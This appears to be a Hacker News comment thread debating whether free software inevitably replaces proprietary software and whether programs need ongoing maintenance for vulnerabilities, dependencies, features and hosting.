You only have to build the alternative once. Yes, there have been some areas where proprietary software has held its ground, but has done just that- it has not replaced free software in the areas that it has control over.
The takeover of free software may be slow, but it is one-directional.
I wish this were true! But keeping your software current in 2022 is an continuous project. UIs improve, platforms shift, features expand, vulns appear, needs change, server bills need to be paid.
I think this is a self-aggrandizing myth that is common in forums like HN with lots of programmers and designers:
- UI's usually do not improve. They "improve" by making subjective changes for the benefit of the maker (often at the cost of the user).
- Platforms are constantly shifting when they are owned by corporations. At first, businesses will penetrate the market by creating a competitive platform. Once their platform has reached critical market share, they will switch to milking their users who are now trapped due to vendor lock-in. This forces users of proprietary software to constantly jump ship in order to get a good deal.
- Features sometimes expand, but most apps will reach a point where it no longer makes sense to add additional features. In the free-software world, we generally try to make an ecosystem of programs that work together: if a single program is too complex, its features may be divided into several smaller programs. In the corporate world, a single program may be bloated and expanded long past the point at which additional complexity will serve the user- so long as developers can continue to invent new ways to extract money, data, etc from their users.
- New vulnerabilities may be uncovered, but generally vulnerabilities are only added when the complexity of program increases. Vulnerabilities don't just appear out of nowhere. If you write a program, it doesn't just become more vulnerable over time just by merit of being old.
- Server bills usually need to be paid because people have inserted themselves as middlemen. If the internet was designed in a way that did not require paying a racketeering fee for DNS, PKI, etc. then we would see a lot of decentralized alternatives to "essential" services.
It's hard for me to entirely put into words how flawed your statement is. If you have time, you may want to check out a book called "Bullshit Jobs: A Theory" by David Graeber (https://libgen.gs/edition.php?id=5852679). It might give you a new perspective on the software industry.
Man, I couldn't disagree more strongly! Programming is like building a house on shifting sand. How many projects that you haven't touched in the last 5 years still run? If you're anything like me, the percentage is vanishingly small - and my old projects aren't even that complicated. If you find that this is a belief "common in forums like HN with lots of programmers", I suspect that's because engineers are the most likely to have the hard-earned experience!
I mean, just look at HN for examples. Quite literally yesterday it happened again: Heroku decided to turn off all old free apps. That's a whole bunch of my old apps that are about to deprecate and break unless I do some work on them.
> Features sometimes expand, but most apps will reach a point where it no longer makes sense to add additional features.
I think this is overly idealistic, or perhaps limited to too small of a problem space. If your software stops adding features, it will quickly be out-competed by software which does have new features that improve productivity. I suppose you could argue that some apps are "finished", but I tend to see those as a rather small subset of all apps - things like single-use command-line utilities, say, like grep and awk. It's hard for me to fathom Photoshop ever being finished - until you're beaming ideas directly from brain to canvas, there's always the possibility that new features can save more time[1].
> Vulnerabilities don't just appear out of nowhere
But this is exactly what vulnerabilities do. One day, there isn't Heartbleed. The next day there is. One day, your Java dependencies are fine. The next day, log4j is broken for everyone on the internet. If you're not on call to solve problems like these, no one is going to use your app.
I don't really understand how you can say "[a program] doesn't just become more vulnerable over time just by merit of being old". This is exactly what happens to any program with dependencies.
> Server bills usually need to be paid because people have inserted themselves as middlemen
People have inserted themselves as middlemen because servers require upkeep, and upkeeping a server takes the time of an experienced professional. They need to be patched for vulns (again), maybe you need to swap out your SSD because it finally ran out of writes, or any in a litany of other problems.
[1]: Then again, with DALL-E, maybe this is happening sooner than we think - but that's beside the point.
> How many projects that you haven't touched in the last 5 years still run?
The ones which were built like a tank in terms of adherence to standards, minimization of dependencies and of assumptions regarding the platform, non-flakey build system etc.
> If your software stops adding features, it will quickly be out-competed by software which does have new features
Not usually. You're probably thinking of things like web browsers.
> because servers require upkeep
If your software does not require continuously running global server(s) then that is not an issue.
>I mean, just look at HN for examples. Quite literally yesterday it happened again: Heroku decided to turn off all old free apps. That's a whole bunch of my old apps that are about to deprecate and break unless I do some work on them.
Yeah, pretty short-sighted of you to go out of your way to design those systems in a way that is dependent on a single company hosting it.
>I suppose you could argue that some apps are "finished", but I tend to see those as a rather small subset of all apps - things like single-use command-line utilities, say, like grep and awk. It's hard for me to fathom Photoshop ever being finished
In an ideal computing environment, the functionalities of a single bloated program like adobe photoshop are completely encompassed by an environment of general-purpose utilities in a way that is analogous to unix shell programs that can interact to perform a variety of tasks.
Modern operating systems are intentionally designed in a way that promotes the commercialization of software. For example, why is it that all third-party software on iOS or android is packaged into distinct, sandboxed "apps" each with their own accompanying icons and whatnot? It's clear that the ability for these "apps" to perform any real inter-process communication is hampered, because the boundaries of the apps represent the boundaries of different competing commercial entities. It is sort of like conway's law, but in reverse: by enforcing a certain structure on software that is distributed, you are selecting for a particular corporate development structure. This analogy goes much deeper than what I can current find the words for. The whole system is quite insidiously woven together.
It is impossible to run any sort of background process (for example, a daemon) in a way that is transparent to other running processes, but it does allow apps to make outgoing connections. This makes the user dependent on an intermediate to provide inter-app communication as a sort of internet-based service.
So I hear you say that software has to compete with the endless "upgrades" of its competitors. I think we have almost never seen a market in which free software based on the unix philosophy has actually competed on its own terms. What we've seen is a market where free software competes on a commercial basis- in producing a distinct, marketable product (as opposed to an environment of inter-working tools) that is comparable to an existing product such that consumers are familiar with it. The unix shell environment is a rare example of an actually good idea coming out of the commercial software, and it's a major foothold for free software that has continued that legacy.
>But this is exactly what vulnerabilities do. One day, there isn't Heartbleed. The next day there is.
If a tree falls in the middle of a forest and no one hears it, does it make a sound?
If there's a bug in software but no one uncovers it, is it a vulnerability? Apparently not according to you.
There would be no heartbleed if there was no implementation of the mostly-useless heartbeat faculty.
There would be no log4jshell if there was no implementation of the bloated JNDI crap.
You are correct, this is exactly what happens when programmers include many useless, bloated, and unvetted dependencies in their project.
Here is the way I see it: At some point you will reach a point in your work where the utility-to-complexity tradeoff will taper off. There is an ideal version of every program that is bug-free and at the plateu of this utility-to-complexity curve. The purpose of all programming is to get close enough to the ideal system and finish- to make something that works well reliably.
Saying that one must continuously revise a program forever to account for new features or vulnerabilities or service providers is like saying that you should continuously revise a book forever because you need to add another chapter or fix another typo or move to another publisher because Heroku stopped printing your book. The goal of writing is to produce a useful-enough book built on sound knowledge, if you are producing something that you think constantly deserves to be revised then you are incompetent- either because you cannot recognize a finished product or because you cannot produce one.
The reason why commercial software is often updated with useless and inane features (much like a college textbook!) obviously serves a much more sinister motive than what you've described here.
>People have inserted themselves as middlemen because servers require upkeep, and up-keeping a server takes the time of an experienced professional. They need to be patched for vulns (again), maybe you need to swap out your SSD because it finally ran out of writes, or any in a litany of other problems.
I see the fact that a service is critically dependent on a single server or maintainer as a design failure. Software should allow users to be more self-sufficient, not less. These centralized systems make you reliant on some sysadmin or someone who essentially performs a "useless job". Check out that book I linked earlier. It's an interesting read.
"It is difficult to get a man to understand something, when his salary depends on his not understanding it."
>> the fact that a service is critically dependent on a single server or maintainer as a design failure. Software should allow users to be more self-sufficient, not less.
Software allows users to be as self-sufficient or not, depending on their skills and resources. There is room for a whole spectrum of users, and obviously as developers we fall on that spectrum as well.
Self suffiency, in any area, is expensive in time, and money. I can grow my own food by buying the land and devoting all day to farming. I'm self sufficient, but I don't have time for anything else.
Equally I can choose to spend time running my own servers. I can buy hardware, learn many things, make mistakes, but be self sufficient.
However all that time spent is time I'm not focusing on my business. If my cousin runs a school, they want a "system that just works". They aren't interested in being self-sufficient. They don't have the time, or money, to (safely) host their own software. They are too busy adding value to their business elsewhere.
(most) OSS to some extent solves a problem that only very few people have. It caters to those who are time rich but cash poor. Most people though are time poor, and can easily find cash to make problems go away.
Adobe wins over Gimp because it does more, faster, thus saving the user time. Its a lot easier to find money than time, so paying the subscription is trivial. If it saves an hour a month, you're ahead even at minimum wage levels.
Of course there are those who value self-sufficiency, who seek out solutions that reduce, or remove, the supply chain. These folk exist in every part of society, and it is a perfectly good approach.
But it is worth understanding that this is a tiny subset of people. Most buy their food in a shop. Most are just using their computer to perform tasks. They have no more desire to write their own code, or host their own server, than they do to grow their own food.
I question the utility of most features Adobe adds to PS these days; but in any case, the problem is easily solved by building a robust plugin system and distributing the work.
I recently spent some time on reviving an old (FLOSS, all server-side, the only UI being CLI and an HTTP API) nodejs 8 software built mostly according to what was considered best practice at the time. I can confidently say you're missing important nuance here.
A counter-argument to this could be "most people were doing it wrong at the time and those best-practices proved to be not very sustainable so your old software was probably garbage already" but at that point we're entering the realm of dismissing reality.
The takeover of free software may be slow, but it is one-directional.